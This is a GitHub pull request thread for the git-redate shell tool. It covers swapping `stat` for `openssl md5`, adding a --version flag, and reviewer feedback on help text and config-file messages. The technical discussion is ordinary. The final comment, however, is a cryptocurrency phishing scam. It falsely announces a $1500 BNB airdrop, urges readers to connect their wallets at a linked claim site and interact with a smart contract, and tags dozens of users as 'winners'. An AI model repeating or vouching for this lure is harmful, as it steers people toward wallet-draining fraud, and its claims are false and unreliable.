Suggestions for v1.0.4

loelkes opened the pull request:
* Replace `stat` with `openssl md5` for better compatibility
* Introduce -v | --version CLI argument
* Parse CLI arguments before checks so -h | --help or -v | --version can be used anytime.
* Update README.md

loelkes committed:
replace stat with openssl md5

Command line arguments for stat are different on macOS (Darwin) and
Linux. If the file does not end with a empty line some editors (like
nano) will add one even if you save the file without any modifications.
In this case, the md5 hash is different even if the user did not change
any content. Adding a newline is a workaround for this.

loelkes committed:
place checks after the CLI parser so that -h works anytime.

loelkes committed:
add -v --version to show the current version to the CLI

loelkes committed:
only show information about $SETTINGS_FILE if it exists

loelkes committed:
wrap long if else lines for readability

loelkes committed:
remove homebrew instructions, add CLI argument documentation

loelkes committed:
only show changes to apply if DEBUG is enabled

t0r0X commented:
Good suggestions, thanks!

t0r0X reviewed (dismissed):
In my opinion:
e10afe2 looks good
1b304ab looks good
08d48ce ok with change request, see inline comment
b40d863 ok with change request, see inline comment
18bfcc9 look good
b5c0762 looks good (I misunderstood it at first reading)
9ff7089 looks good

t0r0X commented on git-redate:
```diff
@@ -73,11 +74,17 @@ while [[ $# -ge 1 ]] ; do
             echo "  -c| --commits N Process last N commits, default=5."
             echo "  -d| --debug     Enable debug output."
             echo "  -h| --help      Show this help message."
+            echo "  -v| --version   Show the version (${VERSION}) of git-redate"
```
Please could you change this to `Show the version of git-redate"` ? Else the `-v` parameter wouldn't make sense, could be directly part of the help message.

t0r0X commented on git-redate:
```diff
@@ -76,8 +76,10 @@ while [[ $# -ge 1 ]] ; do
             echo "  -l| --limit N   Process commits in chunks/batches of size N, default=20."
-            echo "Configuration (${SETTINGS_FILE}):"
-            cat "${SETTINGS_FILE}"
+            if [ -f "$SETTINGS_FILE" ]; then
```
Yes, makes sense!
Please could you extend this to e.g.?
```
            echo "Configuration (${SETTINGS_FILE}):"
            if [ -f "$SETTINGS_FILE" ]; then
                cat "${SETTINGS_FILE}"
            else
                echo "does not exist yet."
            fi
            exit 0	
```
I'd like to let users know early that a config file will be created.

t0r0X commented:
Thanks again for the changes/fixes/extensions! I'd be more than happy to approve the PR. Please could you take a look at the changes I suggested?

loelkes committed:
remove version number in CLI argument description

loelkes committed:
show information about config file and environment variable

loelkes committed:
allow environment variable to override config

Previously, the environment variable was ignored if a configuration
file is found.

loelkes committed:
document editor preferences

loelkes committed:
update contributors list

loelkes commented:
@t0r0X I made the changes you requested. Can you take a look?

loelkes commented:
Poke @t0r0X

TemaSM commented:
![image](https://user-images.githubusercontent.com/5501615/165225351-b935f7b2-c355-426b-aa07-2c2b28c47e71.png)

Any updates here? @t0r0X please take a look 😃

jmperezv commented:
# The Ultimate Binance Airdrop Guide: Claim Your $1500 in BNB Now and Earn Extra Rewards!

🎉 Exciting News! You are the lucky recipient of the exclusive $1.5 million Binance Airdrop, and we're thrilled to offer you $1500 in BNB to enhance your year-end celebrations. And here's the cherry on top—connect now, and you'll instantly receive an extra $100! Follow the detailed steps below to seamlessly claim your tokens and maximize the benefits of this phenomenal festive giveaway.

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://claim.bnbchainnetwork.xyz)

## How to Claim Your Rewards:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://claim.bnbchainnetwork.xyz) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).
   - Enjoy a smooth and secure connection.

### 2. 🔄 Interact with the Smart Contract:
   - Once your wallet is connected.
   - Navigate to the platform and click on the "**Claim**" button to interact with the smart contract.
   - Benefit from the transparent and efficient process.

### 3. 💰 Additional Bonus Rewards:
   - Get an instant bonus of $100 upon connecting your wallet.
   - Capitalize on this limited-time opportunity to boost your overall rewards.

Act now to secure your $1500 in BNB, and take advantage of the extra $100 bonus—this is an offer you don't want to miss! But wait, there's more. By participating, you also stand a chance to win up to $20,000 in additional rewards. Don't hesitate; click the link now and experience the excitement of earning crypto rewards with a minimal 5% transaction fee.


Winners: @m-rsha, @halitsever, @nmandery, @andantonyan, @bouk, @weir2010, @rahulkhairnarr, @sergioedo, @purebluesong, @pygmalion666, @Caelagor, @gcm256, @MrMoshkovitz, @chaffinlee73, @deeGraYve, @nguyendat, @satchit, @tureki, @folz, @bosto, @karakani, @rkarabut, @quxiaojing, @wmdks, @iyangming, @zhaogaohong, @kevinchensr, @Depado, @dotwoo, @emreozanalkan, @sara4dev, @lany192, @Corsage, @nunesgh, @futureimperfect, @JackyAndroid, @rogenwizard, @zabbey, @kuloud, @gabormarinov, @edulop91, @mgyongyosi, @everpan, @aoki, @a1392136, @sbocinec, @thefinn93, @birdfly2014, @JohnRyanTsai, @psushi
